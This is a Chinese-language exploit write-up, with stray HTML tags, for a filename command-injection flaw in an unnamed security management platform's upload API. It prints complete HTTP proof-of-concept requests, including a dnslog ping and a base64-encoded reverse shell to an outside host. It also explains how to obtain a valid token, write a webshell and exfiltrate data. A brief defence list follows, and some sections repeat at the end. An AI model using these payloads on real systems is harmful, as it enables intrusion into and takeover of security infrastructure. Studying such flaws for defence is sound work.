某安防管理平台远程命令执行漏洞分析与利用<\/h1>

漏洞概述<\/h2>
该漏洞存在于某安防管理平台的文件上传功能中，攻击者可以通过精心构造的文件名实现远程命令执行(RCE)。漏洞的核心在于平台对上传文件名的处理不当，导致系统执行了文件名中包含的命令。<\/p>

漏洞细节<\/h2>

漏洞位置<\/h3>

接口路径：\/svm\/api\/v1\/productFile<\/code><\/li>

参数：type=product&ip=127.0.0.1&agentNo=1<\/code><\/li>
<\/ul>
关键发现<\/h3>

平台存在Token鉴权机制，但可以通过特定方式获取有效Token<\/li>
文件上传功能对文件名处理不当，导致命令注入<\/li>
虽然不能直接上传包含"\/"字符的文件名(阻止了直接写webshell)，但可以通过其他方式实现命令执行<\/li>
<\/ol>
漏洞复现<\/h2>
攻击流程<\/h3>

获取有效的Token<\/li>
构造恶意文件上传请求<\/li>
通过文件名注入命令实现RCE<\/li>
<\/ol>
数据包构造<\/h3>
基础PoC<\/h4>
POST<\/span> \/svm\/api\/v1\/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [目标地址]<\/span>
<\/span><\/span>Token:<\/span> [有效Token]<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/113.0<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<\/span>
<\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data;boundary=---------------------------142851345723692939351758052805<\/span>
<\/span><\/span>Content-Length:<\/span> 346<\/span>
<\/span><\/span>
<\/span><\/span>-----------------------------142851345723692939351758052805
<\/span><\/span>Content-Disposition: form-data; name="file"; filename="`ping xxx.dnslog.cn`.zip"
<\/span><\/span>Content-Type: application\/zip
<\/span><\/span>
<\/span><\/span>123
<\/span><\/span>-----------------------------142851345723692939351758052805--
<\/span><\/span><\/code><\/pre>反弹Shell PoC<\/h4>
POST<\/span> \/svm\/api\/v1\/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [目标地址]<\/span>
<\/span><\/span>Token:<\/span> [有效Token]<\/span>
<\/span><\/span>[...其他头部...]<\/span>
<\/span><\/span>
<\/span><\/span>-----------------------------142851345723692939351758052805
<\/span><\/span>Content-Disposition: form-data; name="file"; filename="`echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzkwOTkgMD4mMQ== | base64 -d | bash`.zip"
<\/span><\/span>Content-Type: application\/zip
<\/span><\/span>
<\/span><\/span>123
<\/span><\/span>-----------------------------142851345723692939351758052805--
<\/span><\/span><\/code><\/pre>Token获取机制<\/h2>

平台对除\/static\/<\/code>外的所有路径都会进行Token验证<\/li>
如果传入的Token无效，系统会生成并返回一个新的Token<\/li>
通过构造特定请求可以获取有效Token<\/li>
<\/ol>
漏洞利用进阶<\/h2>
绕过限制写入Webshell<\/h3>
虽然文件名不能包含"\/"字符，但可以通过以下方式写入webshell：<\/p>

使用base64编码webshell内容<\/li>
通过重定向将解码后的内容写入目标文件<\/li>
<\/ol>
示例：<\/p>
echo [<\/span>base64编码的webshell内容]<\/span> | base64 -d > \/path\/to\/target.php
<\/span><\/span><\/code><\/pre>无回显利用<\/h3>
当无法直接获取命令输出时，可以使用以下技术：<\/p>

DNS外带数据<\/li>
HTTP请求外带数据<\/li>
时间盲注技术<\/li>
<\/ol>
防御建议<\/h2>

严格验证上传文件名，过滤特殊字符<\/li>
实现更安全的Token生成和验证机制<\/li>
对文件上传功能进行沙箱隔离<\/li>
限制上传文件的可执行权限<\/li>
定期进行安全审计和代码审查<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了文件处理功能中常见的命令注入风险，以及鉴权机制设计不当可能带来的安全问题。开发人员应特别注意用户输入的处理，尤其是文件名、路径等可能影响系统行为的输入参数。<\/p>

某安防管理平台远程命令执行漏洞分析与利用<\/h1>

漏洞概述<\/h2> 该漏洞存在于某安防管理平台的文件上传功能中，攻击者可以通过精心构造的文件名实现远程命令执行(RCE)。漏洞的核心在于平台对上传文件名的处理不当，导致系统执行了文件名中包含的命令。<\/p>

漏洞细节<\/h2>

漏洞复现<\/h2>

数据包构造<\/h3>

漏洞利用进阶<\/h2>

总结<\/h2> 该漏洞展示了文件处理功能中常见的命令注入风险，以及鉴权机制设计不当可能带来的安全问题。开发人员应特别注意用户输入的处理，尤其是文件名、路径等可能影响系统行为的输入参数。<\/p>

漏洞概述<\/h2>
该漏洞存在于某安防管理平台的文件上传功能中，攻击者可以通过精心构造的文件名实现远程命令执行(RCE)。漏洞的核心在于平台对上传文件名的处理不当，导致系统执行了文件名中包含的命令。<\/p>

总结<\/h2>
该漏洞展示了文件处理功能中常见的命令注入风险，以及鉴权机制设计不当可能带来的安全问题。开发人员应特别注意用户输入的处理，尤其是文件名、路径等可能影响系统行为的输入参数。<\/p>